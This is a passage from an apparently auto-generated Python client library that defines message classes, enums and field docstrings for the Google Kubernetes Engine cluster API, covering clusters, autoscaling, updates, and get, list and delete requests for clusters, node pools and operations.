addresses to the master or set of masters, as well as the ILB VIP. This
field is deprecated, use private_cluster_config.master_ipv4_cidr_block
instead.
monitoringService: The monitoring service the cluster should use to write
metrics. Currently available options: * `monitoring.googleapis.com` -
the Google Cloud Monitoring service. * `none` - no metrics will be
exported from the cluster. * if left as an empty string,
`monitoring.googleapis.com` will be used.
name: The name of this cluster. The name must be unique within this
project and location (e.g. zone or region), and can be up to 40
characters with the following restrictions: * Lowercase letters,
numbers, and hyphens only. * Must start with a letter. * Must end with a
number or a letter.
network: The name of the Google Compute Engine [network](/compute/docs
/networks-and-firewalls#networks) to which the cluster is connected. If
left unspecified, the `default` network will be used.
networkConfig: Configuration for cluster networking.
networkPolicy: Configuration options for the NetworkPolicy feature.
nodeConfig: Parameters used in creating the cluster's nodes. For requests,
this field should only be used in lieu of a "node_pool" object, since
this configuration (along with the "initial_node_count") will be used to
create a "NodePool" object with an auto-generated name. Do not use this
and a node_pool at the same time. For responses, this field will be
populated with the node configuration of the first node pool. (For
configuration of each node pool, see `node_pool.config`) If
unspecified, the defaults are used. This field is deprecated, use
node_pool.config instead.
nodeIpv4CidrSize: [Output only] The size of the address space on each node
for hosting containers. This is provisioned from within the
`container_ipv4_cidr` range. This field will only be set when cluster is
in route-based network mode.
nodePools: The node pools associated with this cluster. This field should
not be set if "node_config" or "initial_node_count" are specified.
nodeSchedulingStrategy: Defines behaviour of k8s scheduler.
podSecurityPolicyConfig: Configuration for the PodSecurityPolicy feature.
privateCluster: If this is a private cluster setup. Private clusters are
clusters that, by default have no external IP addresses on the nodes and
where nodes and the master communicate over private IP addresses. This
field is deprecated, use private_cluster_config.enable_private_nodes
instead.
privateClusterConfig: Configuration for private cluster.
releaseChannel: Release channel configuration.
resourceLabels: The resource labels for the cluster to use to annotate any
related GCE resources.
resourceUsageExportConfig: Configuration for exporting resource usages.
Resource usage export is disabled when this config unspecified.
resourceVersion: Server-defined resource version (etag).
securityProfile: User selected security profile
selfLink: [Output only] Server-defined URL for the resource.
servicesIpv4Cidr: [Output only] The IP address range of the Kubernetes
services in this cluster, in [CIDR](http://en.wikipedia.org/wiki
/Classless_Inter-Domain_Routing) notation (e.g. `1.2.3.4/29`). Service
addresses are typically put in the last `/16` from the container CIDR.
shieldedNodes: Shielded Nodes configuration.
status: [Output only] The current status of this cluster.
statusMessage: [Output only] Additional information about the current
status of this cluster, if available. Deprecated, use the field
conditions instead.
subnetwork: The name of the Google Compute Engine
[subnetwork](/compute/docs/subnetworks) to which the cluster is
connected. On output this shows the subnetwork ID instead of the name.
tierSettings: Cluster tier settings.
tpuIpv4CidrBlock: [Output only] The IP address range of the Cloud TPUs in
this cluster, in [CIDR](http://en.wikipedia.org/wiki/Classless_Inter-
Domain_Routing) notation (e.g. `1.2.3.4/29`).
verticalPodAutoscaling: Cluster-level Vertical Pod Autoscaling
configuration.
workloadIdentityConfig: Configuration for the use of k8s Service Accounts
in GCP IAM policies.
zone: [Output only] The name of the Google Compute Engine
[zone](/compute/docs/zones#available) in which the cluster resides. This
field is deprecated, use location instead.
"""
class NodeSchedulingStrategyValueValuesEnum(_messages.Enum):
r"""Defines behaviour of k8s scheduler.
Values:
STRATEGY_UNSPECIFIED: Use default scheduling strategy.
PRIORITIZE_LEAST_UTILIZED: Least utilized nodes will be prioritized by
k8s scheduler.
PRIORITIZE_MEDIUM_UTILIZED: Nodes with medium utilization will be
prioritized by k8s scheduler. This option improves interoperability of
scheduler with cluster autoscaler.
"""
STRATEGY_UNSPECIFIED = 0
PRIORITIZE_LEAST_UTILIZED = 1
PRIORITIZE_MEDIUM_UTILIZED = 2
class StatusValueValuesEnum(_messages.Enum):
r"""[Output only] The current status of this cluster.
Values:
STATUS_UNSPECIFIED: Not set.
PROVISIONING: The PROVISIONING state indicates the cluster is being
created.
RUNNING: The RUNNING state indicates the cluster has been created and is
fully usable.
RECONCILING: The RECONCILING state indicates that some work is actively
being done on the cluster, such as upgrading the master or node
software. Details can be found in the `statusMessage` field.
STOPPING: The STOPPING state indicates the cluster is being deleted.
ERROR: The ERROR state indicates the cluster may be unusable. Details
can be found in the `statusMessage` field.
DEGRADED: The DEGRADED state indicates the cluster requires user action
to restore full functionality. Details can be found in the
`statusMessage` field.
"""
STATUS_UNSPECIFIED = 0
PROVISIONING = 1
RUNNING = 2
RECONCILING = 3
STOPPING = 4
ERROR = 5
DEGRADED = 6
@encoding.MapUnrecognizedFields('additionalProperties')
class ResourceLabelsValue(_messages.Message):
r"""The resource labels for the cluster to use to annotate any related GCE
resources.
Messages:
AdditionalProperty: An additional property for a ResourceLabelsValue
object.
Fields:
additionalProperties: Additional properties of type ResourceLabelsValue
"""
class AdditionalProperty(_messages.Message):
r"""An additional property for a ResourceLabelsValue object.
Fields:
key: Name of the additional property.
value: A string attribute.
"""
key = _messages.StringField(1)
value = _messages.StringField(2)
additionalProperties = _messages.MessageField('AdditionalProperty', 1, repeated=True)
addonsConfig = _messages.MessageField('AddonsConfig', 1)
authenticatorGroupsConfig = _messages.MessageField('AuthenticatorGroupsConfig', 2)
autoscaling = _messages.MessageField('ClusterAutoscaling', 3)
binaryAuthorization = _messages.MessageField('BinaryAuthorization', 4)
clusterIpv4Cidr = _messages.StringField(5)
clusterTelemetry = _messages.MessageField('ClusterTelemetry', 6)
conditions = _messages.MessageField('StatusCondition', 7, repeated=True)
costManagementConfig = _messages.MessageField('CostManagementConfig', 8)
createTime = _messages.StringField(9)
currentMasterVersion = _messages.StringField(10)
currentNodeCount = _messages.IntegerField(11, variant=_messages.Variant.INT32)
currentNodeVersion = _messages.StringField(12)
databaseEncryption = _messages.MessageField('DatabaseEncryption', 13)
databaseEncryptionKeyId = _messages.StringField(14)
defaultMaxPodsConstraint = _messages.MessageField('MaxPodsConstraint', 15)
description = _messages.StringField(16)
enableKubernetesAlpha = _messages.BooleanField(17)
enableTpu = _messages.BooleanField(18)
endpoint = _messages.StringField(19)
expireTime = _messages.StringField(20)
initialClusterVersion = _messages.StringField(21)
initialNodeCount = _messages.IntegerField(22, variant=_messages.Variant.INT32)
instanceGroupUrls = _messages.StringField(23, repeated=True)
ipAllocationPolicy = _messages.MessageField('IPAllocationPolicy', 24)
labelFingerprint = _messages.StringField(25)
legacyAbac = _messages.MessageField('LegacyAbac', 26)
location = _messages.StringField(27)
locations = _messages.StringField(28, repeated=True)
loggingService = _messages.StringField(29)
maintenancePolicy = _messages.MessageField('MaintenancePolicy', 30)
masterAuth = _messages.MessageField('MasterAuth', 31)
masterAuthorizedNetworksConfig = _messages.MessageField('MasterAuthorizedNetworksConfig', 32)
masterIpv4CidrBlock = _messages.StringField(33)
monitoringService = _messages.StringField(34)
name = _messages.StringField(35)
network = _messages.StringField(36)
networkConfig = _messages.MessageField('NetworkConfig', 37)
networkPolicy = _messages.MessageField('NetworkPolicy', 38)
nodeConfig = _messages.MessageField('NodeConfig', 39)
nodeIpv4CidrSize = _messages.IntegerField(40, variant=_messages.Variant.INT32)
nodePools = _messages.MessageField('NodePool', 41, repeated=True)
nodeSchedulingStrategy = _messages.EnumField('NodeSchedulingStrategyValueValuesEnum', 42)
podSecurityPolicyConfig = _messages.MessageField('PodSecurityPolicyConfig', 43)
privateCluster = _messages.BooleanField(44)
privateClusterConfig = _messages.MessageField('PrivateClusterConfig', 45)
releaseChannel = _messages.MessageField('ReleaseChannel', 46)
resourceLabels = _messages.MessageField('ResourceLabelsValue', 47)
resourceUsageExportConfig = _messages.MessageField('ResourceUsageExportConfig', 48)
resourceVersion = _messages.StringField(49)
securityProfile = _messages.MessageField('SecurityProfile', 50)
selfLink = _messages.StringField(51)
servicesIpv4Cidr = _messages.StringField(52)
shieldedNodes = _messages.MessageField('ShieldedNodes', 53)
status = _messages.EnumField('StatusValueValuesEnum', 54)
statusMessage = _messages.StringField(55)
subnetwork = _messages.StringField(56)
tierSettings = _messages.MessageField('TierSettings', 57)
tpuIpv4CidrBlock = _messages.StringField(58)
verticalPodAutoscaling = _messages.MessageField('VerticalPodAutoscaling', 59)
workloadIdentityConfig = _messages.MessageField('WorkloadIdentityConfig', 60)
zone = _messages.StringField(61)
class ClusterAutoscaling(_messages.Message):
r"""ClusterAutoscaling contains global, per-cluster information required by
Cluster Autoscaler to automatically adjust the size of the cluster and
create/delete node pools based on the current needs.
Enums:
AutoscalingProfileValueValuesEnum: Defines autoscaling behaviour.
Fields:
autoprovisioningLocations: The list of Google Compute Engine
[zones](/compute/docs/zones#available) in which the NodePool's nodes can
be created by NAP.
autoprovisioningNodePoolDefaults: AutoprovisioningNodePoolDefaults
contains defaults for a node pool created by NAP.
autoscalingProfile: Defines autoscaling behaviour.
enableNodeAutoprovisioning: Enables automatic node pool creation and
deletion.
resourceLimits: Contains global constraints regarding minimum and maximum
amount of resources in the cluster.
"""
class AutoscalingProfileValueValuesEnum(_messages.Enum):
r"""Defines autoscaling behaviour.
Values:
PROFILE_UNSPECIFIED: No change to autoscaling configuration.
OPTIMIZE_UTILIZATION: Prioritize optimizing utilization of resources.
BALANCED: Use default (balanced) autoscaling configuration.
"""
PROFILE_UNSPECIFIED = 0
OPTIMIZE_UTILIZATION = 1
BALANCED = 2
autoprovisioningLocations = _messages.StringField(1, repeated=True)
autoprovisioningNodePoolDefaults = _messages.MessageField('AutoprovisioningNodePoolDefaults', 2)
autoscalingProfile = _messages.EnumField('AutoscalingProfileValueValuesEnum', 3)
enableNodeAutoprovisioning = _messages.BooleanField(4)
resourceLimits = _messages.MessageField('ResourceLimit', 5, repeated=True)
class ClusterTelemetry(_messages.Message):
r"""Telemetry integration for the cluster.
Enums:
TypeValueValuesEnum: Type of the integration.
Fields:
type: Type of the integration.
"""
class TypeValueValuesEnum(_messages.Enum):
r"""Type of the integration.
Values:
UNSPECIFIED: Not set.
DISABLED: Monitoring integration is disabled.
ENABLED: Monitoring integration is enabled.
SYSTEM_ONLY: Only system components are monitored and logged.
"""
UNSPECIFIED = 0
DISABLED = 1
ENABLED = 2
SYSTEM_ONLY = 3
type = _messages.EnumField('TypeValueValuesEnum', 1)
class ClusterUpdate(_messages.Message):
r"""ClusterUpdate describes an update to the cluster. Exactly one update can
be applied to a cluster with each request, so at most one field can be
provided.
Fields:
concurrentNodeCount: Controls how many nodes to upgrade in parallel. A
maximum of 20 concurrent nodes is allowed. Deprecated. This feature will
be replaced by an equivalent new feature that gives better control over
concurrency. It is not planned to propagate this field to GA and it will
be eventually removed from the API.
desiredAddonsConfig: Configurations for the various addons available to
run in the cluster.
desiredBinaryAuthorization: The desired configuration options for the
Binary Authorization feature.
desiredCloudNatStatus: The desired status of Cloud NAT for this cluster.
Deprecated: use desired_default_snat_status instead.
desiredClusterAutoscaling: The desired cluster-level autoscaling
configuration.
desiredClusterTelemetry: The desired telemetry integration for the
cluster.
desiredCostManagementConfig: The desired configuration for the fine-
grained cost management feature.
desiredDatabaseEncryption: Configuration of etcd encryption.
desiredDefaultSnatStatus: The desired status of whether to disable default
sNAT for this cluster.
desiredImage: The desired name of the image to use for this node. This is
used to create clusters using a custom image.
desiredImageProject: The project containing the desired image to use for
this node. This is used to create clusters using a custom image.
desiredImageType: The desired image type for the node pool. NOTE: Set the
"desired_node_pool" field as well.
desiredIntraNodeVisibilityConfig: The desired config of Intra-node
visibility.
desiredLocations: The desired list of Google Compute Engine
[zones](/compute/docs/zones#available) in which the cluster's nodes
should be located. Changing the locations a cluster is in will result in
nodes being either created or removed from the cluster, depending on
whether locations are being added or removed. This list must always
include the cluster's primary zone.
desiredLoggingService: The logging service the cluster should use to write
metrics. Currently available options: *
"logging.googleapis.com/kubernetes" - the Google Cloud Logging service
with Kubernetes-native resource model * "logging.googleapis.com" - the
Google Cloud Logging service * "none" - no logs will be exported from
the cluster
desiredMasterAuthorizedNetworksConfig: The desired configuration options
for master authorized networks feature.
desiredMasterVersion: The Kubernetes version to change the master to.
Users may specify either explicit versions offered by Kubernetes Engine
or version aliases, which have the following behavior: - "latest":
picks the highest valid Kubernetes version - "1.X": picks the highest
valid patch+gke.N patch in the 1.X version - "1.X.Y": picks the highest
valid gke.N patch in the 1.X.Y version - "1.X.Y-gke.N": picks an
explicit Kubernetes version - "-": picks the default Kubernetes version
desiredMonitoringService: The monitoring service the cluster should use to
write metrics. Currently available options: *
"monitoring.googleapis.com/kubernetes" - the Google Cloud Monitoring
service with Kubernetes-native resource model *
"monitoring.googleapis.com" - the Google Cloud Monitoring service *
"none" - no metrics will be exported from the cluster
desiredNodePoolAutoscaling: Autoscaler configuration for the node pool
specified in desired_node_pool_id. If there is only one pool in the
cluster and desired_node_pool_id is not provided then the change applies
to that single node pool.
desiredNodePoolId: The node pool to be upgraded. This field is mandatory
if "desired_node_version", "desired_image_family",
"desired_node_pool_autoscaling", or "desired_workload_metadata_config"
is specified and there is more than one node pool on the cluster.
desiredNodeVersion: The Kubernetes version to change the nodes to
(typically an upgrade). Users may specify either explicit versions
offered by Kubernetes Engine or version aliases, which have the
following behavior: - "latest": picks the highest valid Kubernetes
version - "1.X": picks the highest valid patch+gke.N patch in the 1.X
version - "1.X.Y": picks the highest valid gke.N patch in the 1.X.Y
version - "1.X.Y-gke.N": picks an explicit Kubernetes version - "-":
picks the Kubernetes master version
desiredPodSecurityPolicyConfig: The desired configuration options for the
PodSecurityPolicy feature.
desiredPrivateClusterConfig: The desired private cluster configuration.
desiredPrivateIpv6Access: The desired status of Private IPv6 access for
this cluster.
desiredReleaseChannel: The desired release channel configuration.
desiredResourceUsageExportConfig: The desired configuration for exporting
resource usage.
desiredShieldedNodes: Configuration for Shielded Nodes.
desiredVerticalPodAutoscaling: Cluster-level Vertical Pod Autoscaling
configuration.
desiredWorkloadIdentityConfig: Configuration for Workload Identity.
privateClusterConfig: The desired private cluster configuration.
securityProfile: User may change security profile during update
"""
concurrentNodeCount = _messages.IntegerField(1, variant=_messages.Variant.INT32)
desiredAddonsConfig = _messages.MessageField('AddonsConfig', 2)
desiredBinaryAuthorization = _messages.MessageField('BinaryAuthorization', 3)
desiredCloudNatStatus = _messages.MessageField('CloudNatStatus', 4)
desiredClusterAutoscaling = _messages.MessageField('ClusterAutoscaling', 5)
desiredClusterTelemetry = _messages.MessageField('ClusterTelemetry', 6)
desiredCostManagementConfig = _messages.MessageField('CostManagementConfig', 7)
desiredDatabaseEncryption = _messages.MessageField('DatabaseEncryption', 8)
desiredDefaultSnatStatus = _messages.MessageField('DefaultSnatStatus', 9)
desiredImage = _messages.StringField(10)
desiredImageProject = _messages.StringField(11)
desiredImageType = _messages.StringField(12)
desiredIntraNodeVisibilityConfig = _messages.MessageField('IntraNodeVisibilityConfig', 13)
desiredLocations = _messages.StringField(14, repeated=True)
desiredLoggingService = _messages.StringField(15)
desiredMasterAuthorizedNetworksConfig = _messages.MessageField('MasterAuthorizedNetworksConfig', 16)
desiredMasterVersion = _messages.StringField(17)
desiredMonitoringService = _messages.StringField(18)
desiredNodePoolAutoscaling = _messages.MessageField('NodePoolAutoscaling', 19)
desiredNodePoolId = _messages.StringField(20)
desiredNodeVersion = _messages.StringField(21)
desiredPodSecurityPolicyConfig = _messages.MessageField('PodSecurityPolicyConfig', 22)
desiredPrivateClusterConfig = _messages.MessageField('PrivateClusterConfig', 23)
desiredPrivateIpv6Access = _messages.MessageField('PrivateIPv6Status', 24)
desiredReleaseChannel = _messages.MessageField('ReleaseChannel', 25)
desiredResourceUsageExportConfig = _messages.MessageField('ResourceUsageExportConfig', 26)
desiredShieldedNodes = _messages.MessageField('ShieldedNodes', 27)
desiredVerticalPodAutoscaling = _messages.MessageField('VerticalPodAutoscaling', 28)
desiredWorkloadIdentityConfig = _messages.MessageField('WorkloadIdentityConfig', 29)
privateClusterConfig = _messages.MessageField('PrivateClusterConfig', 30)
securityProfile = _messages.MessageField('SecurityProfile', 31)
class CompleteIPRotationRequest(_messages.Message):
r"""CompleteIPRotationRequest moves the cluster master back into single-IP
mode.
Fields:
clusterId: Deprecated. The name of the cluster. This field has been
deprecated and replaced by the name field.
name: The name (project, location, cluster id) of the cluster to complete
IP rotation. Specified in the format
'projects/*/locations/*/clusters/*'.
projectId: Deprecated. The Google Developers Console [project ID or
project
number](https://developers.google.com/console/help/new/#projectnumber).
This field has been deprecated and replaced by the name field.
zone: Deprecated. The name of the Google Compute Engine
[zone](/compute/docs/zones#available) in which the cluster resides. This
field has been deprecated and replaced by the name field.
"""
clusterId = _messages.StringField(1)
name = _messages.StringField(2)
projectId = _messages.StringField(3)
zone = _messages.StringField(4)
class ConfigConnectorConfig(_messages.Message):
r"""Configuration options for the Config Connector add-on.
Fields:
enabled: Whether Cloud Connector is enabled for this cluster.
"""
enabled = _messages.BooleanField(1)
class ConsumptionMeteringConfig(_messages.Message):
r"""Parameters for controlling consumption metering.
Fields:
enabled: Whether to enable consumption metering for this cluster. If
enabled, a second BigQuery table will be created to hold resource
consumption records.
"""
enabled = _messages.BooleanField(1)
class ContainerProjectsAggregatedUsableSubnetworksListRequest(_messages.Message):
r"""A ContainerProjectsAggregatedUsableSubnetworksListRequest object.
Fields:
filter: Filtering currently only supports equality on the networkProjectId
and must be in the form: "networkProjectId=[PROJECTID]", where
`networkProjectId` is the project which owns the listed subnetworks.
This defaults to the parent project ID.
pageSize: The max number of results per page that should be returned. If
the number of available results is larger than `page_size`, a
`next_page_token` is returned which can be used to get the next page of
results in subsequent requests. Acceptable values are 0 to 500,
inclusive. (Default: 500)
pageToken: Specifies a page token to use. Set this to the next_page_token
returned by previous list requests to get the next page of results.
parent: The parent project where subnetworks are usable. Specified in the
format 'projects/*'.
"""
filter = _messages.StringField(1)
pageSize = _messages.IntegerField(2, variant=_messages.Variant.INT32)
pageToken = _messages.StringField(3)
parent = _messages.StringField(4, required=True)
class ContainerProjectsLocationsClustersDeleteRequest(_messages.Message):
r"""A ContainerProjectsLocationsClustersDeleteRequest object.
Fields:
clusterId: Deprecated. The name of the cluster to delete. This field has
been deprecated and replaced by the name field.
name: The name (project, location, cluster) of the cluster to delete.
Specified in the format 'projects/*/locations/*/clusters/*'.
projectId: Deprecated. The Google Developers Console [project ID or
project number](https://support.google.com/cloud/answer/6158840). This
field has been deprecated and replaced by the name field.
zone: Deprecated. The name of the Google Compute Engine
[zone](/compute/docs/zones#available) in which the cluster resides. This
field has been deprecated and replaced by the name field.
"""
clusterId = _messages.StringField(1)
name = _messages.StringField(2, required=True)
projectId = _messages.StringField(3)
zone = _messages.StringField(4)
class ContainerProjectsLocationsClustersGetJwksRequest(_messages.Message):
r"""A ContainerProjectsLocationsClustersGetJwksRequest object.
Fields:
parent: The cluster (project, location, cluster id) to get keys for.
Specified in the format 'projects/*/locations/*/clusters/*'.
"""
parent = _messages.StringField(1, required=True)
class ContainerProjectsLocationsClustersGetRequest(_messages.Message):
r"""A ContainerProjectsLocationsClustersGetRequest object.
Fields:
clusterId: Deprecated. The name of the cluster to retrieve. This field has
been deprecated and replaced by the name field.
name: The name (project, location, cluster) of the cluster to retrieve.
Specified in the format 'projects/*/locations/*/clusters/*'.
projectId: Deprecated. The Google Developers Console [project ID or
project number](https://support.google.com/cloud/answer/6158840). This
field has been deprecated and replaced by the name field.
zone: Deprecated. The name of the Google Compute Engine
[zone](/compute/docs/zones#available) in which the cluster resides. This
field has been deprecated and replaced by the name field.
"""
clusterId = _messages.StringField(1)
name = _messages.StringField(2, required=True)
projectId = _messages.StringField(3)
zone = _messages.StringField(4)
class ContainerProjectsLocationsClustersListRequest(_messages.Message):
r"""A ContainerProjectsLocationsClustersListRequest object.
Fields:
parent: The parent (project and location) where the clusters will be
listed. Specified in the format 'projects/*/locations/*'. Location "-"
matches all zones and all regions.
projectId: Deprecated. The Google Developers Console [project ID or
project number](https://support.google.com/cloud/answer/6158840). This
field has been deprecated and replaced by the parent field.
zone: Deprecated. The name of the Google Compute Engine
[zone](/compute/docs/zones#available) in which the cluster resides, or
"-" for all zones. This field has been deprecated and replaced by the
parent field.
"""
parent = _messages.StringField(1, required=True)
projectId = _messages.StringField(2)
zone = _messages.StringField(3)
class ContainerProjectsLocationsClustersNodePoolsDeleteRequest(_messages.Message):
r"""A ContainerProjectsLocationsClustersNodePoolsDeleteRequest object.
Fields:
clusterId: Deprecate. The name of the cluster. This field has been
deprecated and replaced by the name field.
name: The name (project, location, cluster, node pool id) of the node pool
to delete. Specified in the format
'projects/*/locations/*/clusters/*/nodePools/*'.
nodePoolId: Deprecated. The name of the node pool to delete. This field
has been deprecated and replaced by the name field.
projectId: Deprecated. The Google Developers Console [project ID or
project
number](https://developers.google.com/console/help/new/#projectnumber).
This field has been deprecated and replaced by the name field.
zone: Deprecated. The name of the Google Compute Engine
[zone](/compute/docs/zones#available) in which the cluster resides. This
field has been deprecated and replaced by the name field.
"""
clusterId = _messages.StringField(1)
name = _messages.StringField(2, required=True)
nodePoolId = _messages.StringField(3)
projectId = _messages.StringField(4)
zone = _messages.StringField(5)
class ContainerProjectsLocationsClustersNodePoolsGetRequest(_messages.Message):
r"""A ContainerProjectsLocationsClustersNodePoolsGetRequest object.
Fields:
clusterId: Deprecated. The name of the cluster. This field has been
deprecated and replaced by the name field.
name: The name (project, location, cluster, node pool id) of the node pool
to get. Specified in the format
'projects/*/locations/*/clusters/*/nodePools/*'.
nodePoolId: Deprecated. The name of the node pool. This field has been
deprecated and replaced by the name field.
projectId: Deprecated. The Google Developers Console [project ID or
project
number](https://developers.google.com/console/help/new/#projectnumber).
This field has been deprecated and replaced by the name field.
zone: Deprecated. The name of the Google Compute Engine
[zone](/compute/docs/zones#available) in which the cluster resides. This
field has been deprecated and replaced by the name field.
"""
clusterId = _messages.StringField(1)
name = _messages.StringField(2, required=True)
nodePoolId = _messages.StringField(3)
projectId = _messages.StringField(4)
zone = _messages.StringField(5)
class ContainerProjectsLocationsClustersNodePoolsListRequest(_messages.Message):
r"""A ContainerProjectsLocationsClustersNodePoolsListRequest object.
Fields:
clusterId: Deprecated. The name of the cluster. This field has been
deprecated and replaced by the parent field.
parent: The parent (project, location, cluster id) where the node pools
will be listed. Specified in the format
'projects/*/locations/*/clusters/*'.
projectId: Deprecated. The Google Developers Console [project ID or
project
number](https://developers.google.com/console/help/new/#projectnumber).
This field has been deprecated and replaced by the parent field.
zone: Deprecated. The name of the Google Compute Engine
[zone](/compute/docs/zones#available) in which the cluster resides. This
field has been deprecated and replaced by the parent field.
"""
clusterId = _messages.StringField(1)
parent = _messages.StringField(2, required=True)
projectId = _messages.StringField(3)
zone = _messages.StringField(4)
class ContainerProjectsLocationsClustersWellKnownGetOpenidConfigurationRequest(_messages.Message):
r"""A
ContainerProjectsLocationsClustersWellKnownGetOpenidConfigurationRequest
object.
Fields:
parent: The cluster (project, location, cluster id) to get the discovery
document for. Specified in the format
'projects/*/locations/*/clusters/*'.
"""
parent = _messages.StringField(1, required=True)
class ContainerProjectsLocationsGetServerConfigRequest(_messages.Message):
r"""A ContainerProjectsLocationsGetServerConfigRequest object.
Fields:
name: The name (project and location) of the server config to get,
specified in the format 'projects/*/locations/*'.
projectId: Deprecated. The Google Developers Console [project ID or
project number](https://support.google.com/cloud/answer/6158840). This
field has been deprecated and replaced by the name field.
zone: Deprecated. The name of the Google Compute Engine
[zone](/compute/docs/zones#available) to return operations for. This
field has been deprecated and replaced by the name field.
"""
name = _messages.StringField(1, required=True)
projectId = _messages.StringField(2)
zone = _messages.StringField(3)
class ContainerProjectsLocationsListRequest(_messages.Message):
r"""A ContainerProjectsLocationsListRequest object.
Fields:
parent: Contains the name of the resource requested. Specified in the
format 'projects/*'.
"""
parent = _messages.StringField(1, required=True)
class ContainerProjectsLocationsOperationsGetRequest(_messages.Message):
r"""A ContainerProjectsLocationsOperationsGetRequest object.
Fields:
name: The name (project, location, operation id) of the operation to get.
Specified in the format 'projects/*/locations/*/operations/*'.
operationId: Deprecated. The server-assigned `name` of the operation. This
field has been deprecated and replaced by the name field.
projectId: Deprecated. The Google Developers Console [project ID or
project number](https://support.google.com/cloud/answer/6158840). This
field has been deprecated and replaced by the name field.
zone: Deprecated. The name of the Google Compute Engine
[zone](/compute/docs/zones#available) in which the cluster resides. This
field has been deprecated and replaced by the name field.
"""
name = _messages.StringField(1, required=True)
operationId = _messages.StringField(2)
projectId = _messages.StringField(3)
zone = _messages.StringField(4)
class ContainerProjectsLocationsOperationsListRequest(_messages.Message):
r"""A ContainerProjectsLocationsOperationsListRequest object.
Fields:
parent: The parent (project and location) where the operations will be
listed. Specified in the format 'projects/*/locations/*'. Location "-"
matches all zones and all regions.
projectId: Deprecated. The Google Developers Console [project ID or
project number](https://support.google.com/cloud/answer/6158840). This
field has been deprecated and replaced by the parent field.
zone: Deprecated. The name of the Google Compute Engine
[zone](/compute/docs/zones#available) to return operations for, or `-`
for all zones. This field has been deprecated and replaced by the parent
field.
"""
parent = _messages.StringField(1, required=True)
projectId = _messages.StringField(2)
zone = _messages.StringField(3)
class ContainerProjectsZonesClustersDeleteRequest(_messages.Message):
r"""A ContainerProjectsZonesClustersDeleteRequest object.
Fields:
clusterId: Deprecated. The name of the cluster to delete. This field has
been deprecated and replaced by the name field.
name: The name (project, location, cluster) of the cluster to delete.
Specified in the format 'projects/*/locations/*/clusters/*'.
projectId: Deprecated. The Google Developers Console [project ID or
project number](https://support.google.com/cloud/answer/6158840). This
field has been deprecated and replaced by the name field.
zone: Deprecated. The name of the Google Compute Engine
[zone](/compute/docs/zones#available) in which the cluster resides. This
field has been deprecated and replaced by the name field.
"""
clusterId = _messages.StringField(1, required=True)
name = _messages.StringField(2)
projectId = _messages.StringField(3, required=True)
zone = _messages.StringField(4, required=True)
class ContainerProjectsZonesClustersGetRequest(_messages.Message):
r"""A ContainerProjectsZonesClustersGetRequest object.
Fields:
clusterId: Deprecated. The name of the cluster to retrieve. This field has
been deprecated and replaced by the name field.
name: The name (project, location, cluster) of the cluster to retrieve.
Specified in the format 'projects/*/locations/*/clusters/*'.
projectId: Deprecated. The Google Developers Console [project ID or
project number](https://support.google.com/cloud/answer/6158840). This
field has been deprecated and replaced by the name field.
zone: Deprecated. The name of the Google Compute Engine
[zone](/compute/docs/zones#available) in which the cluster resides. This
field has been deprecated and replaced by the name field.
"""
clusterId = _messages.StringField(1, required=True)
name = _messages.StringField(2)
projectId = _messages.StringField(3, required=True)
zone = _messages.StringField(4, required=True)
class ContainerProjectsZonesClustersListRequest(_messages.Message):
r"""A ContainerProjectsZonesClustersListRequest object.
Fields:
parent: The parent (project and location) where the clusters will be
listed. Specified in the format 'projects/*/locations/*'. Location "-"
matches all zones and all regions.
projectId: Deprecated. The Google Developers Console [project ID or
project number](https://support.google.com/cloud/answer/6158840). This
field has been deprecated and replaced by the parent field.
zone: Deprecated. The name of the Google Compute Engine
[zone](/compute/docs/zones#available) in which the cluster resides, or
"-" for all zones. This field has been deprecated and replaced by the
parent field.
"""
parent = _messages.StringField(1)
projectId = _messages.StringField(2, required=True)
zone = _messages.StringField(3, required=True)
class ContainerProjectsZonesClustersNodePoolsDeleteRequest(_messages.Message):
r"""A ContainerProjectsZonesClustersNodePoolsDeleteRequest object.
Fields:
clusterId: Deprecate. The name of the cluster. This field has been
deprecated and replaced by the name field.
name: The name (project, location, cluster, node pool id) of the node pool
to delete. Specified in the format
'projects/*/locations/*/clusters/*/nodePools/*'.
nodePoolId: Deprecated. The name of the node pool to delete. This field
has been deprecated and replaced by the name field.
projectId: Deprecated. The Google Developers Console [project ID or
project
number](https://developers.google.com/console/help/new/#projectnumber).
This field has been deprecated and replaced by the name field.
zone: Deprecated. The name of the Google Compute Engine
[zone](/compute/docs/zones#available) in which the cluster resides. This
field has been deprecated and replaced by the name field.
"""
clusterId = _messages.StringField(1, required=True)
name = _messages.StringField(2)
nodePoolId = _messages.StringField(3, required=True)
projectId = _messages.StringField(4, required=True)
zone = _messages.StringField(5, required=True)
class ContainerProjectsZonesClustersNodePoolsGetRequest(_messages.Message):
r"""A ContainerProjectsZonesClustersNodePoolsGetRequest object.
Fields:
clusterId: Deprecated. The name of the cluster. This field has been
deprecated and replaced by the name field.
name: The name (project, location, cluster, node pool id) of the node pool
to get. Specified in the format
'projects/*/locations/*/clusters/*/nodePools/*'.
nodePoolId: Deprecated. The name of the node pool. This field has been
deprecated and replaced by the name field.
projectId: Deprecated. The Google Developers Console [project ID or
project
number](https://developers.google.com/console/help/new/#projectnumber).
This field has been deprecated and replaced by the name field.
zone: Deprecated. The name of the Google Compute Engine
[zone](/compute/docs/zones#available) in which the cluster resides. This
field has been deprecated and replaced by the name field.
"""
clusterId = _messages.StringField(1, required=True)
name = _messages.StringField(2)
nodePoolId = _messages.StringField(3, required=True)
projectId = _messages.StringField(4, required=True)
zone = _messages.StringField(5, required=True)
class ContainerProjectsZonesClustersNodePoolsListRequest(_messages.Message):
r"""A ContainerProjectsZonesClustersNodePoolsListRequest object.
Fields:
clusterId: Deprecated. The name of the cluster. This field has been
deprecated and replaced by the parent field.
parent: The parent (project, location, cluster id) where the node pools
will be listed. Specified in the format
'projects/*/locations/*/clusters/*'.
projectId: Deprecated. The Google Developers Console [project ID or
project
number](https://developers.google.com/console/help/new/#projectnumber).
This field has been deprecated and replaced by the parent field.
zone: Deprecated. The name of the Google Compute Engine
[zone](/compute/docs/zones#available) in which the cluster resides. This
field has been deprecated and replaced by the parent field.
"""
clusterId = _messages.StringField(1, required=True)
parent = _messages.StringField(2)
projectId = _messages.StringField(3, required=True)
zone = _messages.StringField(4, required=True)
class ContainerProjectsZonesGetServerconfigRequest(_messages.Message):
r"""A ContainerProjectsZonesGetServerconfigRequest object.
Fields:
name: The name (project and location) of the server config to get,
specified in the format 'projects/*/locations/*'.
projectId: Deprecated. The Google Developers Console [project ID or
project number](https://support.google.com/cloud/answer/6158840). This
field has been deprecated and replaced by the name field.
zone: Deprecated. The name of the Google Compute Engine
